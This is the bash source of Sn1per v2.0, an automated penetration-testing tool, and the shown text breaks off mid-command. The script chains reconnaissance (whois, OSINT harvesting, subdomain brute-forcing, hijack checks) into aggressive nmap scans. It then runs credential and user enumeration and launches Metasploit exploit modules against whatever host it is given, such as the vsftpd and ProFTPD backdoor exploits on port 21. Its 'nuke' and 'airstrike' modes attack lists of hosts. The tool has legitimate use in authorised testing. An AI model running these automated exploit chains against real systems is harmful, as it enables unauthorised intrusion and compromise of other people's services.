#!/bin/bash # + -- --=[Sn1per v2.0 by 1N3 # + -- --=[http://crowdshield.com # # Sn1per - Automated Pentest Recon Tool # # FEATURED: # - Automatically collect recon info (ie. whois, ping, DNS, etc.) # - Automatically collects Google hacking recon info # - Automatically run port scans # - Automatically brute force sub-domains via DNS # - Automatically checks for sub-domain hijacking # - Automatically run targeted nmap scripts against open ports # - Automatically scans all web applications # - Automatically brute forces all open services # - Automatically runs targeted metasploit scan and exploit modules # - Automatically scan multiple hosts # # INSTALL: # ./install.sh - Installs all dependencies. Best run from Kali Linux. # # USAGE: # ./sniper # ./sniper # ./sniper discover # ./sniper stealth # ./sniper port # ./sniper web # ./sniper airstrike # ./sniper nuke # ./sniper loot # TARGET="$1" MODE="$2" OPT1="$3" INSTALL_DIR="/usr/share/sniper" LOOT_DIR="/usr/share/sniper/loot" PLUGINS_DIR="/usr/share/sniper/plugins" CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py" SAMRDUMP="/usr/share/sniper/bin/samrdump.py" DNSDICT6="/usr/share/sniper/bin/dnsdict6" INURLBR="/usr/share/sniper/bin/inurlbr.php" USER_FILE="/usr/share/brutex/wordlists/simple-users.txt" PASS_FILE="/usr/share/brutex/wordlists/password.lst" DNS_FILE="/usr/share/brutex/wordlists/namelist.txt" SUPER_MICRO_SCAN="/usr/share/sniper/plugins/SuperMicro-Password-Scanner/supermicro_scan.sh" THREADS="30" OKBLUE='\033[94m' OKRED='\033[91m' OKGREEN='\033[92m' OKORANGE='\033[93m' RESET='\e[0m' REGEX='^[0-9]+$' cd $INSTALL_DIR # ENABLE/DISABLE AUTOMATIC BRUTE FORCE # DEFAULT IS "1" (ENABLED) AUTOBRUTE="1" if [ -z $TARGET ]; then echo -e "$OKRED ____ $RESET" echo -e "$OKRED _________ / _/___ ___ _____$RESET" echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" echo -e "$OKRED /_/ $RESET" echo -e "" echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET" echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3$RESET" echo -e "$OKORANGE + -- --=[Usage: sn1per $RESET" echo "" exit fi function loot { echo -e "$OKRED ____ $RESET" echo -e "$OKRED _________ / _/___ ___ _____$RESET" echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" echo -e "$OKRED /_/ $RESET" echo "" cd $LOOT_DIR echo -e "$OKORANGE + -- --=[Sorting loot directory ($LOOT_DIR)" echo -e "$OKORANGE + -- --=[Generating reports..." for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" > $LOOT_DIR/reports/$a sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a >> $LOOT_DIR/reports/$a mv $a $LOOT_DIR/output/ done rm -f $LOOT_DIR/.fuse_* 2> /dev/null echo -e "$OKORANGE + -- --=[Opening loot directory..." iceweasel $LOOT_DIR &> /dev/null & zenmap -f $LOOT_DIR/nmap/ &> /dev/null & echo -e "$OKORANGE + -- --=[Done!" } if [[ ${TARGET:0:1} =~ $REGEX ]]; then SCAN_TYPE="IP" else SCAN_TYPE="DOMAIN" fi #clear if [ "$MODE" = "report" ]; then sniper $TARGET | tee $LOOT_DIR/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1 exit fi if [ "$TARGET" = "loot" ]; then loot exit fi if [ "$MODE" = "discover" ]; then echo -e "$OKRED ____ /\\" echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\" echo -e "$OKRED https://crowdshield.com \ \\" echo -e "$OKRED ___ / \\" echo -e "$OKRED \ \\" echo -e "$OKRED === > [ \\" echo -e "$OKRED / \ \\" echo -e "$OKRED \ / /" echo -e "$OKRED === > [ /" echo -e "$OKRED / /" echo -e "$OKRED ___ \ /" echo -e "$OKRED / /" echo -e "$OKRED ____ / /" echo -e "$OKRED \/$RESET" echo "" echo -e "$OKGREEN + -- ----------------------------=[Running Ping Discovery Scan]=------------- -- +$RESET" nmap -sP $TARGET echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET" arp -a -n echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET" unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 2>/dev/null | awk '{print $6}' | sort -u > $LOOT_DIR/domains/sniper-ips.txt echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET" cat $LOOT_DIR/domains/sniper-ips.txt echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET" echo "" if [ "$OPT1" = "report" ]; then for a in `cat $LOOT_DIR/domains/sniper-ips.txt` do sniper $a stealth report done exit fi for a in `cat $LOOT_DIR/domains/sniper-ips.txt` do sniper $a stealth done exit fi if [ "$MODE" = "web" ]; then if [ "$OPT1" = "report" ]; then sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 loot exit fi fi if [ "$MODE" = "stealth" ]; then if [ "$OPT1" = "report" ]; then sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" echo -e "$OKRED _________ / _/___ ___ _____$RESET" echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" echo -e "$OKRED /_/ $RESET" echo -e "$RESET" echo -e "$OKORANGE + -- --=[http://crowdshield.com" echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3" echo -e "$OKRED " echo -e "$OKRED ./\." echo -e "$OKRED ./ '\." echo -e "$OKRED \. '\." echo -e "$OKRED '\. '\." echo -e "$OKRED '\. '\." echo -e "$OKRED '\. '\." echo -e "$OKRED ./ '\." echo -e "$OKRED ./ ____'\." echo -e "$OKRED ./ < '\." echo -e "$OKRED \-------\ '> '\." echo -e "$OKRED '\=====> ___< '\." echo -e "$OKRED ./-----/ __________'\." echo -e "$OKRED "' \.------\ _____ ___(_)(_\."\' echo -e "$OKRED '\=====> < ./'" echo -e "$OKRED ./-----/ '> ./" echo -e "$OKRED \. ___< ./" echo -e "$OKRED '\. ./" echo -e "$OKRED '\. ./" echo -e "$OKRED '\. ./" echo -e "$OKRED ./ ./" echo -e "$OKRED ./ ./ Carl Pilcher" echo -e "$OKRED ./ ./" echo -e "$OKRED ./ ./" echo -e "$OKRED ./ ./" echo -e "$OKRED \. ./" echo -e "$OKRED '\. ./" echo -e "$OKRED '\/" echo -e "$RESET" echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET" echo -e "$OKGREEN $RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" nslookup $TARGET host $TARGET if [ $SCAN_TYPE == "DOMAIN" ]; then echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" whois $TARGET echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" theharvester -d $TARGET -l 100 -b bing 2> /dev/null echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" dig -x $TARGET dnsenum $TARGET mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done; echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null fi echo "" echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` if [ -z "$port_80" ]; then echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f http://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" whatweb http://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" xsstracer $TARGET 80 echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg fi if [ -z "$port_443" ]; then echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f https://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" whatweb https://$TARGET echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" xsstracer $TARGET 443 echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET sslscan --no-failed $TARGET echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/$a-port443.jpg" fi echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" loot rm -f $INSTALL_DIR/.fuse_* 2> /dev/null exit fi if [ "$MODE" = "airstrike" ]; then if [ "$OPT1" = "report" ]; then sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi echo -e "$OKRED ____ $RESET" echo -e "$OKRED _________ / _/___ ___ _____$RESET" echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" echo -e "$OKRED /_/ $RESET" echo -e "$RESET" echo -e "$OKORANGE + -- --=[http://crowdshield.com" echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3" for a in `cat $TARGET`; do echo -e "$OKRED |" echo -e "$OKRED | |" echo -e "$OKRED | -/_\-" echo -e "$OKRED -/_\- ______________(/ . \)______________" echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" echo -e "$OKRED <> \___/ <> <>" echo -e "$OKRED " echo -e "$OKRED ||" echo -e "$OKRED <>" echo -e "$OKRED ||" echo -e "$OKRED <>" echo -e "$OKRED ||" echo -e "$OKRED || BIG" echo -e "$OKRED _____ __ <> (^)))^ BOOM!" echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" echo -e "$OKRED | ||. | | | ||| |||||" echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" echo -e "$OKRED | ||. | | | ||| |||||" echo -e "$OKRED __________________________________________________________" echo -e "$OKRED Bomb raid (contributed by Michael aka SNOOPY@DRYCAS.CLUB.CC.CMU.EDU)" echo -e "$RESET" echo -e "$OKORANGE + -- --=[Launching airstrike: $a $RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" nslookup $a host $a if [[ ${a:0:1} =~ $REGEX ]]; then SCAN_TYPE="IP" else SCAN_TYPE="DOMAIN" fi if [ $SCAN_TYPE == "DOMAIN" ]; then echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" whois $a echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" theharvester -d $a -l 100 -b bing 2> /dev/null echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" dig -x $a dnsenum $a mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" python Sublist3r/sublist3r.py -d $a -vvv -o $LOOT_DIR/domains/domains-$a.txt 2>/dev/null dos2unix $LOOT_DIR/domains/domains-$a.txt 2>/dev/null echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" for b in `cat $LOOT_DIR/domains/domains-$a.txt 2> /dev/null`; do dig $b CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done; echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" python SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null fi echo "" echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET" nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a -oX $LOOT_DIR/nmap/nmap-$a.xml port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open` port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open` if [ -z "$port_80" ]; then echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f http://$a echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" whatweb http://$a echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" xsstracer $a 80 echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" cutycapt --url=http://$a --out=$LOOT_DIR/screenshots/$a-port80.jpg fi if [ -z "$port_443" ]; then echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f https://$a echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" whatweb https://$a echo -e "$OKGREEN + -- ----------------------------=[Checking Headers and Methods]=------------ -- +$RESET" xsstracer $a 443 echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a sslscan --no-failed $a echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" cutycapt --url=https://$a --out=$LOOT_DIR/screenshots/$a-port443.jpg echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$a-port443.jpg" fi echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET" loot echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" done; exit fi if [ "$MODE" = "port" ]; then if [ -z "$OPT1" ]; then echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET" exit fi fi if [ "$MODE" = "nuke" ]; then if [ "$OPT1" = "report" ]; then sniper $TARGET $MODE | tee $LOOT_DIR/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 exit fi for a in `cat $TARGET`; do echo -e "$OKRED " echo -e "$OKRED ____" echo -e "$OKRED __,-~~/~ \`---." echo -e "$OKRED _/_,---( , )" echo -e "$OKRED __ / < / ) \___" echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -" echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/" echo -e "$OKRED (_ ( \ ( > \)" echo -e "$OKRED \_( _ < >_>'" echo -e "$OKRED ~ \`-i' ::>|--\"" echo -e "$OKRED I;|.|.|" echo -e "$OKRED <|i::|i|\`." echo -e "$OKRED (\` ^''\`-' ')" echo -e "$OKRED --------------------------------------------------------- $RESET" echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET" sniper $a echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" echo -e "" done exit fi echo -e "$OKRED ____ $RESET" echo -e "$OKRED _________ / _/___ ___ _____$RESET" echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" echo -e "$OKRED /_/ $RESET" echo -e "$RESET" echo -e "$OKORANGE + -- --=[http://crowdshield.com" echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3" echo -e "$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" nslookup $TARGET host $TARGET echo -e "$OKGREEN + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +$RESET" xprobe2 $TARGET if [ $SCAN_TYPE == "DOMAIN" ]; then echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" whois $TARGET echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" theharvester -d $TARGET -l 100 -b bing 2> /dev/null echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" dig -x $TARGET dnsenum $TARGET mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done; echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null fi echo "" echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET" ping -c 1 $TARGET echo "" echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" if [ -z "$OPT1" ]; then nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET elif [ "$OPT1" == "web" ]; then nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml else nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" nmap -sU -T5 -p U:$OPT1 --open $TARGET fi service postgresql start echo "" echo -e "$OKGREEN + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +$RESET" port_21=`grep 'portid="21"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_22=`grep 'portid="22"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_23=`grep 'portid="23"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_25=`grep 'portid="25"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_53=`grep 'portid="53"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_79=`grep 'portid="79"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_389=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_445=`grep 'portid="445"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_512=`grep 'portid="512"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_513=`grep 'portid="513"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_514=`grep 'portid="514"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_1099=`grep 'portid="1099"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_1433=`grep 'portid="1433"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_1524=`grep 'portid="1524"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_2049=`grep 'portid="2049"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_2121=`grep 'portid="2121"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3128=`grep 'portid="3128"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` if [ -z "$port_21" ]; then echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET" nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;" fi if [ -z "$port_22" ]; then echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET" cd ssh-audit python ssh-audit.py $TARGET:22 cd .. nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;" fi if [ -z "$port_23" ]; then echo -e "$OKRED + -- --=[Port 23 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET" echo "" cisco-torch -A $TARGET nmap -A -sV -T5 --script=telnet* -p 23 $TARGET msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;" fi if [ -z "$port_25" ]; then echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET" nmap -A -sV -T5 --script=smtp* -p 25 $TARGET smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" fi if [ -z "$port_53" ]; then echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET" nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET fi if [ -z "$port_79" ]; then echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET" nmap -A -sV -T5 --script=finger* -p 79 $TARGET bin/fingertool.sh $TARGET $USER_FILE fi if [ -z "$port_80" ]; then echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f http://$TARGET echo "" echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" whatweb http://$TARGET xsstracer $TARGET 80 echo "" echo -e "$OKGREEN + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +$RESET" echo -e "$OKBLUE+ -- --=[Checking if X-Content options are enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I http://$TARGET | egrep -i 'X-Content' | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking if X-Frame options are enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I http://$TARGET | egrep -i 'X-Frame' | tail -n 10 echo "" echo -e "$OKBLUE+ -- --=[Checking if X-XSS-Protection header is enabled on $TARGET...$RESET $OKORANGE" curl -s --insecure -I http://$TARGET | egrep -i 'X-XSS' | tail -n 10 echo "" echo -e "$OKBLUE+ -- 